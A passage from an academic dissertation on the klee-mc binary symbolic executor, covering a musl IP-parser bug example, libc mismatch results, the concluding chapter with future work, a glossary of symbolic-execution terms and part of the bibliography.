case 2 : a [ 3 ] = a [ 2 ] & 0 x f f ; a [ 2 ] > >= 8 ;
}
for ( i = 0 ; i <4 ; i++){
i f( a [ i ] >255) return−1;
( (char∗)&d ) [ i ] = a [ i ] ;
}
Figure 6.12: Simplified IP address parser from musl .
Figure 6.12 shows an example broken edge case detected with symMMU uncon-
strained pointers. The figure lists a simplified internet host address parser adapted
from the musl library which converts an IPv4 numbers-and-dots notation string ( s)
to a network byte order integer address ( d). During symbolic execution, the uncon-
strained buffer fills in the contents for swith symbolic values. The code works for four
numeric parts (e.g., 127.0.0.1) but misinterprets other valid addresses. For example,
the class C address “1.1” converts to 0x01000001 instead of the expected address
0x0101 .
Table 6.6 summarizes the mismatches with glibc using unconstrained pointers.
We were careful to exclude functions which rely on volatile system state, use struc-
tures with undefined width (e.g., stdio file functions), return no value, or always
crashed. The percentage of mismatching functions is considerable given our conser-
vative analysis. One interesting class of differences reflects arcane specialized con-
figuration details. For instance, glibc ’s timezone support causes newlib and musl
to drift several hours when computing mktime (uClibc crashes, lacking /etc/TZ ).
CHAPTER 6. SYMBOLICALLY EXECUTED MEMORY MANAGEMENT UNIT 167
Library Mismatched Functions % Total Tested
musl 86 25%
newlib 45 30%
uclibc 32 8%
Total 117 24%
Table 6.6: Mismatches against glibc involving unconstrained pointers
Furthermore, inconsistent locale handling across libraries contributes to mismatched
wide character data.
6.6 Conclusion
This chapter introduced symbolic execution with symbolically executed memory ac-
cesses through a symMMU. By separating memory access policy from the dispatch
mechanism, we have implemented a variety of access policies and memory analysis
algorithms with minimal effort. Microbenchmarks demonstrate the importance of
access policy for symbolic executor performance. Large scale comparative results
indicate the symMMU finds more access faults with fewer false positives than a tradi-
tional built-in access dispatcher. Overall, this work suggests that forwarding memory
accesses to a symbolically executed runtime is a beneficial design choice in a symbolic
executor.
Chapter 7
Conclusion
7.1 Summary of Contributions
Chapter 2 introduced the design and philosophy behind the klee-mc binary sym-
bolic executor. The chapter focused on the modifications and extensions necessary
to adequately support machine code in a mature symbolic execution system. We
demonstrate that klee-mc can analyze huge program sets, finding thousands of
unique program faults. The additional system complexity and flood of data hints
at the increased importance of robustness and correctness when analyzing machine
code, a recurring theme throughout this dissertation.
Chapter 3 described the cross-checking capabilities which ensure high-integrity
test case generation. The cross-checking in klee-mc validates the symbolic interpre-
tation of LLVM code, the translation of machine code, solver stack, and expression
optimization, finding executor bugs that otherwise would go unnoticed due to the
overwhelming amount of test data. Since klee-mc analyzes machine code, cross-
checking works down to the hardware level, both confirming when the symbolic ex-
ecutor models computation on physical hardware and detecting when it does not.
Chapter 4 extended the symbolic executor to support symbolic floating-point op-
erations. The floating-point operations were self-testing by virtue of being runtime
libraries, generating their own test cases. When tested against hardware, similar
to the prior chapter, the tests revealed divergence among the floating-point code,
168
CHAPTER 7. CONCLUSION 169
floating-point solvers, and physical floating-point hardware.
Chapter 5 presented the system’s reduction rule based expression optimizer. The
system discovered expression optimizations from its own programs by searching a
database of observed expressions, building reduction rules, and finally establishing
equivalence with the solver. These rules generalize to match larger classes of ex-
pressions and verify their correctness using the constraint solver. Applying the rules
results in a 17% reduction of total queries and a 10% speedup on average.
Chapter 6 continued extending the system by replacing built-in symbolic memory
handlers with symbolically executed libraries. The library version of the built-in
symbolic pointer policy is both more reliable and better at finding access faults. To
demonstrate the mechanism’s flexibility, new heap analysis and lazily allocated buffer
passes were also implemented as libraries, finding over a thousand heap violations
and over a hundred libc implementation mismatches. The results from these passes
were automatically confirmed outside the symbolic executor with third party tools.
Overall, this dissertation shows a binary symbolic executor should be built in such
a way that it can test itself. Since machine code ultimately has a physical ground
truth in hardware, designing a binary symbolic execution system without test case
validation facilities makes debugging a needless struggle. By establishing a foundation
of precision through fast detection of executor errors, should they arise, it becomes
possible to develop new features, while keeping the old ones, to analyze programs
with little concern over hidden false positives polluting results.
7.2 Future Work
Despite its strong self-checking properties, klee-mc still leaves open a great deal of
research problems and engineering challenges. Generally speaking and as outlined
in the introduction, the primary objective of klee-mc as a binary program analysis
platform is to totally generate complete test suites for all interesting behavior in
arbitrary machine code programs. There are several broad categories of work which
can push the system toward this goal.
CHAPTER 7. CONCLUSION 170
7.2.1 Programs and Modeling
klee-mc targets several architectures running Linux and 32-bit Windows; this is far
from all programs. Acquiring a bulk set of programs, even with snapshotting, can be
involved. Furthermore, even when programs run on the executors, many still need
incredibly precise system modeling to exercise all paths.
As shown in Section 2.5.1, simply running a program on a system should not be
taken for granted. Once a platform has a snapshotter, there tends to be little dif-
ficulty saving process images. On the other hand, merely running a program on its
intended platform, natively constructing the process image, is less straightforward. If
a program relies on an obscure library that is not installed, it will fail to launch; all
dependencies must be resolved for the program to run. In general, no complex oper-
ating system perfectly automatically resolves library dependencies; the best solution
may use virtual machines with all system repository packages installed. On Windows,
programs and their dependencies are often distributed using software packers which
unpack the true executable from a compressed data section following a few mouse
click, therefore demanding an extra stage of extraction that requires some engineer-
ing to automate. Software packages that attempt to decode packed executables are
unreliable in practice; a better method could programmatically fuzz interfaces and
track file creation to retrieve any binaries written out to the file system.
Once a program is loaded, the system model should approximate the platform so
that it behaves in all manners the program could possibly encounter. As discussed
in Section 3.3.2, a poor model weakens the executor’s ability to produce good tests.
Although continuing to develop system model code could lead to an excellent model,
this approach appears rather Sisyphean: on top of carefully symbolically encoding
all operating system behavior, new system interfaces would also need to be closely
followed and supported (e.g., driver-defined ioctl s). Ideally, the system model would
be automatically derived from the target platform. This could be done by having a
mechanism which reuses system code or having a method to learn an approximate
model from system call traces.
CHAPTER 7. CONCLUSION 171
7.2.2 Scaling
There are two modes of scaling that are important for a program analysis system.
First, there is breadth: the system should routinely process as many programs as
possible, ideally sharing results. Second, there is depth: the system should be able
to analyze programs of any size with a degree of thoroughness. Both takes on scaling
deserve attention.
A system that can process nearly any binary program yet does not is a waste
of potential. A modern trend in computing is the consolidation of services to huge,
centrally maintained systems; one of these services in the future could be program
checking. This centralization is a stark contrast to the developer tool model where
a each user runs the analysis tool on their own development machine; given the
difficulty of installing symbolic execution tools (a task occasionally relegated to virtual
machines [24, 34]), the myriad of options and failure modes that rely on specialist
knowledge, the substantial and unbounded processing times, the inconvenience of
merely reporting false paths (let alone fixing them), and that binary code is less closely
guarded than source, the author firmly believes focusing on purely local tooling is
remarkably short-sighted for pursuing future trends. The advantages to a consolidated
model include greater opportunities for data sharing, thereby improving performance
in general, and better visibility of system defects. Ultimately, improving breadth of
data sets implies developing interesting tactics for reusing execution data (Chapter 5
is one example) as well as better automated infrastructure for managing bulk program
data.
The resources needed to represent large program states pose a significant chal-
lenge. Arguably, larger programs could be handled by running the analysis on larger
machines, but this quickly becomes unrealistic. The executor may eventually process
larger programs by only considering small pieces of the program at once, to limit path
length and compute time, or only holding a few states in memory at a time, to limit
memory use. Unconstrained execution ( §6.4.3) could be one solution for processing
smaller components of larger software. A piecewise approach could then be stitched
back together to analyze the program as a whole.
CHAPTER 7. CONCLUSION 172
7.2.3 Coverage
All symbolic executors suffer from poor coverage on large programs, partially because
of the path explosion problem. If an executor fails to cover a significant portion of
a program’s code, its tests will typically be superficial and of little value. Improving
code coverage means addressing the path explosion problem.
If a symbolic executor begins at a program’s entry point, it often becomes lost
in useless states due to following error paths; defensive programming means most
inputs are cause for errors. On the other hand, running a program directly on its
native platform, rather than modeling the platform on the executor, can avoid these
error paths, reaching states a symbolic executor may never find. Hence, starting
symbolic execution from states that are likely on an actual system (i.e., seed states)
but unlikely under symbolic execution due to path explosion could improve coverage.
Pulling snapshot sequences ( §3.3.1) from a general desktop system with low-overhead
could possibly be a source of useful seed states.
Good coverage can be cast as a search or scheduling problem. In essence, the ex-
ecutor has a set of states from which it must choose one to explore. An optimal state
schedule for coverage selects states in an order that would cover the maximum amount
of code while dispatching the fewest instructions. Although a general scheduler that
always selects an optimal schedule is impossible, there are certainly heuristics which
improve coverage in practice. Choosing the right heuristics is arguably an open prob-
lem, although as it stands, this has been an excuse to leave the executor’s scheduler
as one of the least developed components of the system.
Finally, difficult to reach code can be covered by removal of context. One approach
could use unconstrained execution with lazily allocated buffers to jump to code with-
out a path; the challenge is to demonstrate that the tests are relevant with respect to
the rest of the program. Another approach is to abstract [79] away functions or loops
that cause path explosion, making side-effects symbolic; the challenge here consists
of knowing the appropriate abstraction to apply (i.e, where to place side-effects) as
well as soundly refining the abstraction to produce a legitimate program path.
CHAPTER 7. CONCLUSION 173
7.2.4 Types of Analysis
The meaning of “interesting” behavior is intentionally vague. What precisely con-
stitutes behavior of interest depends on the program semantics, platform semantics,
and threat model. Essentially, behavior worth mentioning corresponds to the types
of analysis applied to the program.
The primary focus of klee-mc has been on bugs that cause program faults lead-
ing to machine exceptions. These bugs are easy to confirm since the hardware de-
tects faults on replay. However, most bugs do not raise exceptions; heap violations
(§6.4.2) being one example explored in this work. Such bugs include privilege es-
calation, TOCTOU attacks, and information leaks. Additional functionality to finds
these bugs, or any richer program properties for that matter, could be implemented
through runtime libraries, but confirming any results will require integration with (or
developing) traditional dynamic analysis tools.
Although klee-mc goes through great lengths to reduce system non-determinism
when running programs, there are program behaviors only exposed through non-
deterministic mechanisms. The two most obvious mechanisms are threading and
signals. Na ̈ ıve methods for handling non-determinism lead to exponential state ex-
plosion, making them impractical without further optimization (FIE [45], for instance,
prunes equivalent states for small programs) or forcing determinism (Cloud9 [37], for
instance, uses cooperative threading). Careful application of program knowledge,
such as analyzing working sets to discover isolation boundaries, might prove more
worthwhile toward finding bugs in non-deterministic code.
Still, this assumes some prior knowledge of what behavior is of interest. Aside
from classes of bugs which may be ignored as an oversight, there are certainly classes
of bugs without names. For instance, it may make sense to mine for idiomatic use
of system features. Alternatively, searching for so-called “divergent” behavior could
reveal new bugs. However, at the binary level, care must be taken to avoid false
alarms since the meaning may be unclear, making analyzing potential bugs by hand
a costly endeavor.
CHAPTER 7. CONCLUSION 174
7.3 Final Thoughts
Binary symbolic execution is both the worst program analysis method and the best.
It’s the worst because it’s expensive to run and hard to get right. One the other
hand, it’s the best way to automatically produce sound test cases on arbitrary soft-
ware. If finding software bugs en masse is the future of program checking, the human
factor must reduced to primarily a supervisory role. Binary symbolic execution can
lead the way toward such aggressively automated program checking by mechanically
generating high-quality reproducible test cases for commodity software.
Appendix A
Glossary
This glossary is defines important terms and acronyms that appear in this disserta-
tion. Some of these terms may be overloaded in the literature but for this dissertation
only have one meaning.
Basic Block – A code sequence with a single entry point. All control flow decisions
exit the sequence.
Binary Program – A computer program, usually compiled from a higher-level lan-
guage, in machine code format.
Binary Symbolic Executor – A symbolic executor that can symbolically execute
binary programs.
Bitcode – Code compiled into the machine format for the LLVM intermediate rep-
resentation.
Branch – A conditional jump in program code guarded by a predicate.
Concrete Data – Data that takes the form of a numeric constant.
Concrete Replay – Reproducing a path, free of symbolic data, with a concrete test
case, usually with the JIT.
Concrete Test – A variable assignment and system call log used by the JIT for the
concrete replay of a path.
Concretize – The process of converting a symbolic value to a concrete value with
respect to a constraint set.
Constraint – A predicate that is an element of a state’s constraint set.
175
APPENDIX A. GLOSSARY 176
Constraint Set – A satisfiable conjunction of constraints associated with a state.
Contingent – The property of a predicate where both it and its negation have a
satisfying assignment assuming the current state’s constraints.
Coverage – A metric for measuring unique instructions executed by a test.
Cross-check – Comparing two similar components for equivalence.
Dynamic Binary Translator – A system to translate basic blocks of machine code
to an intermediate representation on demand
Expression – A well-formed formula over a set of operations and atoms. For symbolic
execution, the set of bitwise and arithmetic operators, arrays, and numeric constants.
Expression Builder – A component of a symbolic executor responsible for con-
structing expressions.
Fault – Program behavior that causes hardware to raise an exception, often leading
to program termination.
Feasible – The property of a predicate which has a satisfying assignment assuming
the current state’s constraints.
Fork – The action of splitting a state into two states where one assumes a predicate p
and the other assumes the negation ¬p. Often brought about by a contingent branch.
Guest – The target program running inside the symbolic executor.
Instrumentation – Code that is inserted into other code for analysis purposes.
Intermediate Representation – A language intended to express code semantics in
a way that is easy to process by compiler-like tools.
Intrinsic – A built-in function in the symbolic executor accessible by runtime li-
braries. Similar to a system call.
IR– See intermediate representation
JIT – A Just-in-Time interpreter that compiles and runs LLVM code as executable
machine code.
klee – An LLVM symbolic executor.
klee-mc – A machine code extension of klee .
Machine Code – The instruction format directly processed by a CPU.
Memory Object – A memory region in a state which represents a single copy-on-
write unit.
APPENDIX A. GLOSSARY 177
MMU – Memory management unit
Overconstrained – A state or model that underapproximates possible program con-
figurations.
Path Constraint – A constraint on a state incurred by following a contingent con-
ditional branch.
Predicate – A boolean expression.
Query – A satisfiable set of constraints and a formula predicate bundled together for
a solver which questions whether their conjunction is satisfiable.
Reduction Rule – A term rewriting template that matches and rewrites a class of
expressions to logically equivalent smaller expressions.
Register Log – A trace of a program’s register states prior to every basic block
dispatched by the symbolic executor.
Replay – The process of reproducing the path described by a test case.
Runtime Library – A symbolically executed collection of bitcode, loaded as part of
every state, which supplies support functions for the executor.
Satisfiable – The property of a predicate which will evaluate to true under some
variable assignment.
SMTLIB – A human-readable language for expressing constraint satisfaction prob-
lems for bit-vectors over arrays.
Snapshot – A point-in-time copy of memory, registers, and other resources for a
running program
Soft Floating-point – An integer code implementation of floating-point operations.
Typically used for emulating floating-point instructions on integer-only processors.
Solver – Software that implements a decision procedure to resolve constraint satis-
faction problems.
Solver Call – A request made by the symbolic executor into a complete decision
procedure to solve a query.
State – The materialization of partially explored path in the symbolic executor. A
machine configuration with symbolic data.
Symbolic Data – Data that includes a variable term. (cf. concrete data)
Symbolic Executor – A complete system for symbolically executing code, including
APPENDIX A. GLOSSARY 178
a solver, expression builder, code translation, and test case generation.
Symbolic Interpreter – The component of the symbolic executor responsible for
dispatching instructions on symbolic data.
System Call – A binary program request for an operating system service.
System Call Log – A log of side effects from the system model when servicing sys-
tem calls for a path.
System Model – A runtime library that emulates an operating system or program
runtime environment.
Test Case – Data which can be used to reproduce a program path.
Unconstrained Pointer – A pointer which maps to a lazily allocated buffer.
Underconstrained – An overapproximation of possible program configurations; po-
tentially infeasible
Valid – The property of a predicate which has no satisfying assignment for its nega-
tion assuming the current state’s constraints.
Validate – To demonstrate correctness of code for a path.
Variable Assignment – A set of arrays of concrete values which concretizes an ex-
pression or set of expressions.
Verify – To prove correctness of code for all paths and values.
Bibliography
[1] Jade Alglave, Alastair F. Donaldson, Daniel Kroening, and Michael Tautschnig.
Making Software Verification Tools Really Work. In Tevfik Bultan and Pao-Ann
Hsiung, editors, Proceedings of the 9th International Conference on Automated
Technology for Verification and Analysis , ATVA’11, pages 28–42, Berlin, Hei-
delberg, 2011. Springer-Verlag.
[2] Austin Appleby. murmurhash3. http://sites.google.com/site/murmurhash, Nov
2012.
[3] M. Aron, Y. Park, T. Jaeger, J. Liedtke, K. Elphinstone, and L. Deller. The
SawMill Framework for Virtual Memory Diversity. In Computer Systems Archi-
tecture Conference, 2001. ACSAC 2001. Proceedings. 6th Australasian , pages
3–10, 2001.
[4] Shay Artzi, Julian Dolby, S.H. Jensen, A. Moller, and Frank Tip. A Framework
for Automated Testing of Javascript Web Applications. In Proceedings of the
33rd International Conference on Software Engineering , ICSE’11, pages 571
–580, May 2011.
[5] Shay Artzi, Adam Kie ̇ zun, Julian Dolby, Frank Tip, Danny Dig, Amit Paradkar,
and Michael D. Ernst. Finding Bugs in Web Applications using Dynamic Test
Generation and Explicit State Model Checking. IEEE Transactions on Software
Engineering , 36(4):474–494, July/August 2010.
[6] Roberto Bagnara, Matthieu Carlier, Roberta Gori, and Arnaud Gotlieb. Sym-
bolic Path-Oriented Test Data Generation for Floating-Point Programs. In
179
BIBLIOGRAPHY 180
Proceedings of the 6th IEEE International Conference on Software Testing, Ver-
ification and Validation , ICST’13, pages 1–10, Luxembourg City, Luxembourg,
2013. IEEE Press.
[7] Vasanth Bala, Evelyn Duesterwald, and Sanjeev Banerjia. Dynamo: A Trans-
parent Dynamic Optimization System. In Proceedings of the ACM SIGPLAN
2000 Conference on Programming Language Design and Implementation , PLDI
’00, pages 1–12, 2000.
[8] Gogul Balakrishnan, Radu Gruian, Thomas Reps, and Tim Teitelbaum.
CodeSurfer/x86– A Platform for Analyzing x86 Executables. In Proceedings
of the 14th International Conference on Compiler Construction , CC’05, pages
250–254, Berlin, Heidelberg, 2005. Springer-Verlag.
[9] Sorav Bansal and Alex Aiken. Binary Translation using Peephole Superopti-
mizers. In Proceedings of the 8th USENIX Conference on Operating Systems
Design and Implementation , OSDI’08, pages 177–192, 2008.
[10] Earl T. Barr, Thanh Vo, Vu Le, and Zhendong Su. Automatic Detection of
Floating-Point Exceptions. In Proceedings of the 40th annual ACM SIGPLAN-
SIGACT Symposium on Principles of programming languages , POPL ’13, pages
549–560, New York, NY, USA, 2013. ACM.
[11] Clark Barrett, Leonardo de Moura, and Aaron Stump. Design and results of the
first satisfiability modulo theories competition (SMT-COMP 2005). Journal of
Automated Reasoning , 2006.
[12] Clark Barrett, Aaron Stump, and Cesare Tinelli. The SMT-LIB Standard:
Version 2.0. In A. Gupta and D. Kroening, editors, Proc. of the 8th Int’l
Workshop on Satisfiability Modulo Theories (Edinburgh, England) , 2010.
[13] Clark Barrett and Cesare Tinelli. CVC3. In Werner Damm and Holger Her-
manns, editors, Computer Aided Verification , volume 4590 of Lecture Notes in
Computer Science , pages 298–302. Springer Berlin Heidelberg, 2007.
BIBLIOGRAPHY 181
[14] Kent Beck. Test Driven Development: By Example . Addison-Wesley Longman
Publishing Co., Inc., Boston, MA, USA, 2002.
[15] Fabrice Bellard. QEMU, a Fast and Portable Dynamic Translator. In USENIX
2005 Annual Technical Conference, FREENIX Track , pages 41–46.
[16] Mordechai Ben-Ari. The Bug that Destroyed a Rocket. ACM SIGCSE Bulletin ,
33(2):58, 2001.
[17] Al Bessey, Ken Block, Ben Chelf, Andy Chou, Bryan Fulton, Seth Hallem,
Charles Henri-Gros, Asya Kamsky, Scott McPeak, and Dawson Engler. A few
billion lines of code later: using static analysis to find bugs in the real world.
Communications of the ACM , 53(2):66–75, 2010.
[18] Sam Blackshear, Bor-Yuh Evan Chang, and Manu Sridharan. Thresher: Precise
Refutations for Heap Reachability. In Proceedings of the ACM SIGPLAN 2013
Conference on Programming Language Design and Implementation , PLDI’13,
pages 275–286, 2013.
[19] B. Blanchet, P. Cousot, R. Cousot, J. Feret, L. Mauborgne, A. Min ́ e, D. Mon-
niaux, and X. Rival. A Static Analyzer for Large Safety-Critical Software. In
Proceedings of the ACM SIGPLAN 2003 Conference on Programming Language
Design and Implementation , PLDI’03, pages 196–207, San Diego, California,
USA, June 7–14 2003. ACM Press.
[20] Bernard Botella, Arnaud Gotlieb, and Claude Michel. Symbolic Execution of
Floating-Point Computations. Software Testing, Verification and Reliability ,
16(2):97–121, 2006.
[21] Robert S. Boyer, Bernard Elspas, and Karl N. Levitt. SELECT – A Formal
System for Testing and Debugging Programs by Symbolic Execution. In Pro-
ceedings of the International Conference on Reliable software , pages 234–245,
1975.
BIBLIOGRAPHY 182
[22] Angelo Brillout, Daniel Kroening, and Thomas Wahl. Mixed Abstractions for
Floating-Point Arithmetic. In FMCAD , pages 69–76. IEEE, 2009.
[23] David Brumley, Cody Hartwig, Min Gyung Kang, Zhenkai Liang, James New-
some, Pongsin Poosankam, Dawn Song, and Heng Yin. BitScope: Automati-
cally dissecting malicious binaries. Technical report, In CMU-CS-07-133, 2007.
[24] David Brumley, Ivan Jager, Thanassis Avgerinos, and Edward Schwartz. BAP:
A Binary Analysis Platform. In Ganesh Gopalakrishnan and Shaz Qadeer,
editors, Computer Aided Verification , volume 6806 of LNCS , pages 463–469.
Springer Berlin / Heidelberg, 2011.
[25] Robert Brummayer and Armin Biere. Boolector: An Efficient SMT Solver for
Bit-Vectors and Arrays. In Proceedings of the 15th International Conference on
Tools and Algorithms for the Construction and Analysis of Systems , TACAS
’09, pages 174–177, Berlin, Heidelberg, 2009. Springer-Verlag.
[26] Robert Brummayer and Armin Biere. Fuzzing and Delta-debugging SMT
Solvers. In Proceedings of the 7th International Workshop on Satisfiability Mod-
ulo Theories , SMT ’09, pages 1–5, New York, NY, USA, 2009. ACM.
[27] J. Burnim and K. Sen. Heuristics for Scalable Dynamic Test Generation. In
Proceedings of the 2008 23rd IEEE/ACM International Conference on Auto-
mated Software Engineering , ASE ’08, pages 443–446, Washington, DC, USA,
2008. IEEE Computer Society.
[28] Cristian Cadar, Daniel Dunbar, and Dawson Engler. KLEE: Unassisted and
Automatic Generation of High-coverage Tests for Complex Systems Programs.
InProceedings of the 8th USENIX Conference on Operating Systems Design
and Implementation , OSDI’08, pages 209–224, 2008.
[29] Cristian Cadar, Vijay Ganesh, Peter M. Pawlowski, David L. Dill, and Daw-
son R. Engler. EXE: Automatically Generating Inputs of Death. In Proceedings
of the 13th ACM Conference on Computer and Communications Security , CCS
’06, pages 322–335, New York, NY, USA, 2006. ACM.
BIBLIOGRAPHY 183
[30] Sang Kil Cha, Thanassis Avgerinos, Alexandre Rebert, and David Brumley.
Unleashing Mayhem on Binary Code. In IEEE Symposium on Security and
Privacy , pages 380–394, 2012.
[31] Avik Chaudhuri and Jeffrey Foster. Symbolic Security Analysis of Ruby-on-
Rails Web Applications. In Proceedings of the 17th ACM Conference on Com-
puter and Communications Security , CCS’10, pages 585–594. ACM, 2010.
[32] Ting Chen, Xiao-song Zhang, Cong Zhu, Xiao-li Ji, Shi-ze Guo, and Yue Wu.
Design and Implementation of a Dynamic Symbolic Execution Tool for Win-
dows Executables. Journal of Software: Evolution and Process , 25(12):1249–
1272, 2013.
[33] Anton Chernoff, Mark Herdeg, Ray Hookway, Chris Reeve, Norman Rubin,
Tony Tye, S. Bharadwaj Yadavalli, and John Yates. FX!32 - A Profile-Directed
Binary Translator. IEEE Micro , 18:56–64, 1998.
[34] Vitaly Chipounov, Volodymyr Kuznetsov, and George Candea. S2E: A Platform
for In-vivo Multi-path Analysis of Software Systems. In Proceedings of the
Sixteenth International Conference on Architectural Support for Programming
Languages and Operating Systems , ASPLOS ’11, pages 265–278, 2011.
[35] Chia Yuan Cho, Domagoj Babi ́ c, Pongsin Poosankam, Kevin Zhijie Chen, Ed-
ward XueJun Wu, and Dawn Song. MACE: Model-inference-Assisted Concolic
Exploration for Protocol and Vulnerability Discovery. In Proceedings of the 20th
USENIX Security Symposium , August 2011.
[36] Alonzo Church and J. B. Rosser. Some Properties of Conversion. Transactions
of the American Mathematical Society , 39(3):472–482, 1936.
[37] Liviu Ciortea, Cristian Zamfir, Stefan Bucur, Vitaly Chipounov, and George
Candea. Cloud9: A Software Testing Service. SIGOPS Operating Systems
Review , 43:5–10, January 2010.
BIBLIOGRAPHY 184
[38] Edmund Clarke, Orna Grumberg, Somesh Jha, Yuan Lu, and Helmut Veith.
Counterexample-guided Abstraction Refinement for Symbolic Model Checking.
J. ACM , 50(5):752–794, September 2003.
[39] Lori A. Clarke. A Program Testing System. In Proceedings of the 1976 Annual
Conference , ACM ’76, pages 488–491, 1976.
[40] Manuel Clavel, Francisco Dur ́ an, Steven Eker, Patrick Lincoln, Narciso Mart ́ ı-
Oliet, Jos ́ e Meseguer, and Carolyn Talcott. The Maude 2.0 System. In Proceed-
ings of the 14th International Conference on Rewriting Techniques and Appli-
cations , RTA’03, pages 76–87, Berlin, Heidelberg, 2003. Springer-Verlag.
[41] Peter Collingbourne, Cristian Cadar, and Paul H.J. Kelly. Symbolic Crosscheck-
ing of Floating-Point and SIMD Code. In Proceedings of the sixth conference
on Computer systems , EuroSys ’11, pages 315–328, New York, NY, USA, 2011.
ACM.
[42] Sylvain Conchon, Guillaume Melquiond, Cody Roux, and Mohamed Iguer-
nelala. Built-in Treatment of an Axiomatic Floating-Point Theory for SMT
Solvers. In Pascal Fontaine and Amit Goel, editors, SMT 2012 , volume 20 of
EPiC Series , pages 12–21. EasyChair, 2013.
[43] Patrick Cousot and Radhia Cousot. Abstract Interpretation: A Unified Lattice
Model for Static Analysis of Programs by Construction or Approximation of
Fixpoints. In Proceedings of the 4th ACM SIGACT-SIGPLAN Symposium on
Principles of Programming Languages , POPL ’77, pages 238–252, New York,
NY, USA, 1977. ACM.
[44] Heming Cui, Gang Hu, Jingyue Wu, and Junfeng Yang. Verifying Systems
Rules using Rule-Directed Symbolic Execution. In Proceedings of the Eighteenth
International Conference on Architectural Support for Programming Languages
and Operating Systems , ASPLOS ’13, 2013.
BIBLIOGRAPHY 185
[45] Drew Davidson, Benjamin Moench, Somesh Jha, and Thomas Ristenpart. FIE
on Firmware: Finding Vulnerabilities in Embedded Systems using Symbolic Ex-
ecution. In USENIX Security , Berkeley, CA, USA, 2013. USENIX Association.
[46] Jack W. Davidson and Christopher W. Fraser. Automatic Generation of Peep-
hole Optimizations. In SIGPLAN Symposium on Compiler Construction , pages
111–116, 1984.
[47] Ernest Davis. Constraint Propagation with Interval Labels. Artificial Intelli-
gence , 32(3):281–331, July 1987.
[48] G. De Michell and R.K. Gupta. Hardware/software co-design. Proceedings of
the IEEE , 85(3):349 –365, March 1997.
[49] Leonardo De Moura and Nikolaj Bjørner. Z3: An Efficient SMT Solver. In
C. R. Ramakrishnan and Jakob Rehof, editors, Proceedings of the Theory and
practice of software, 14th International Conference on Tools and Algorithms
for the Construction and Analysis of Systems , TACAS’08/ETAPS’08, pages
337–340, Berlin, Heidelberg, 2008. Springer-Verlag.
[50] Xianghua Deng, Jooyong Lee, and Robby. Efficient and Formal Generalized
Symbolic Execution. Automated Software Engg. , 19(3):233–301, September
2012.
[51] B. Dutertre and L. de Moura. The Yices SMT Solver. Tool paper at
http://yices.csl.sri.com/tool-paper.pdf, August 2006.
[52] Bassem Elkarablieh, Patrice Godefroid, and Michael Y. Levin. Precise Pointer
Reasoning for Dynamic Test Generation. In Proceedings of the Eighteenth In-
ternational Symposium on Software Testing and Analysis , ISSTA ’09, pages
129–140, New York, NY, USA, 2009. ACM.
[53] Dawson R. Engler, Sandeep K. Gupta, and M. Frans Kaashoek. AVM:
Application-level Virtual Memory. In Proceedings of the 5th Workshop on Hot
Topics in Operating Systems , HotOS-V, pages 72–77, May 1995.
BIBLIOGRAPHY 186
[54] Christopher W. Fraser. A compact, machine-independent peephole optimizer.
InProceedings of the 6th ACM SIGACT-SIGPLAN Symposium on Principles
of Programming Languages , POPL ’79, pages 1–6. ACM, 1979.
[55] Vijay Ganesh and David L. Dill. A Decision Procedure for Bit-Vectors and
Arrays. In Werner Damm and Holger Hermanns, editors, Computer Aided
Verification , Berlin, Germany, July 2007. Springer-Verlag.
[56] D. Gelperin and B. Hetzel. The Growth of Software Testing. Communications
of the ACM , 31(6):687–695, June 1988.
[57] Patrice Godefroid and Johannes Kinder. Proving Memory Safety of Floating-
Point Computations by Combining Static and Dynamic Program Analysis. In
Proceedings of the 19th International Symposium on Software Testing and Anal-
ysis, ISSTA ’10, pages 1–12, New York, NY, USA, 2010. ACM.
[58] Patrice Godefroid, Nils Klarlund, and Koushik Sen. DART: Directed Auto-
mated Random Testing. In Proceedings of the 2005 ACM SIGPLAN Confer-
ence on Programming Language Design and Implementation , PLDI’05, pages
213–223, June 2005.
[59] Patrice Godefroid, Michael Y. Levin, and David Molnar. Automated Whitebox
Fuzz Testing. In Proceedings of the Network and Distributed System Security
Symposium , NDSS ’08. The Internet Society, 2008.
[60] Patrice Godefroid and Ankur Taly. Automated Synthesis of Symbolic Instruc-
tion Encodings from I/O Samples. In Proceedings of the ACM SIGPLAN 2012
conference on Programming language Design and Implementation , PLDI’12,
pages 441–452, 2012.
[61] David Goldberg. What Every Computer Scientist Should Know About Floating-
Point Arithmetic. ACM Computing Surveys , 23:5–48, 1991.
[62] Dan Goodin. Google Confirms Critical Android Crypto Flaw Used in $5,700 Bit-
coin heist. http://arstechnica.com/security/2013/08/google-confirms-
BIBLIOGRAPHY 187
critical-android-crypto-flaw-used-in-5700-bitcoin-heist . August
14, 2013.
[63] Eric Goubault and Sylvie Putot. Static Analysis of Numerical Algorithms. In
Proceedings of the 13th International Conference on Static Analysis , SAS’06,
pages 18–34, Berlin, Heidelberg, 2006. Springer-Verlag.
[64] Leopold Haller, Alberto Griggio, Martin Brain, and Daniel Kroening. Deciding
Floating-Point Logic with Systematic Abstraction. In Gianpiero Cabodi and
Satnam Singh, editors, FMCAD , pages 131–140. IEEE, 2012.
[65] T. Hansen, P. Schachte, and H. Søndergaard. State Joining and Splitting for
the Symbolic Execution of Binaries. In S. Bensalem and D. A. Peled, editors,
Runtime Verification , pages 76–92. Springer, 2009.
[66] Reed Hastings and Bob Joyce. Purify: Fast Detection of Memory Leaks and
Access Errors. In Proc. of the Winter 1992 USENIX Conf. , pages 125–138,
1991.
[67] John Hauser. SoftFloat-2b. www.jhauser.us/arithmetic/SoftFloat.html, 2002.
[68] Benjamin Hillery, Eric Mercer, Neha Rungta, and Suzette Person. Towards a
Lazier Symbolic Pathfinder. SIGSOFT Softw. Eng. Notes , 39(1):1–5, February
2014.
[69] W.E. Howden. Symbolic Testing and the DISSECT Symbolic Evaluation Sys-
tem. Software Engineering, IEEE Transactions on , SE-3(4):266 – 278, July
1977.
[70] G ́ erard Huet. Confluent Reductions: Abstract Properties and Applications to
Term Rewriting Systems. J. ACM , 27(4):797–821, October 1980.
[71] IEEE Task P754. ANSI/IEEE 754-1985, Standard for Binary Floating-Point
Arithmetic . August 1985.
BIBLIOGRAPHY 188
[72] F. Ivan ̆ ci` c, M. K. Ganai, S. Sankaranarayanan, and A. Gupta. Software Model
Checking the Precision of Floating-Point Programs. In Proceedings of the 8th
ACM/IEEE International Conference on Formal Methods and Models for Code-
sign, MEMOCODE 2010, pages 49–58. IEEE, 2010.
[73] W. Kahan. Implementation of Algorithms (Lecture Notes by W. S. Haugeland
and D. Hough). Technical Report 20, 1973.
[74] Jochen Karrer. Softgun – The Embedded System Simulator.
http://softgun.sourceforge.net, 2013.
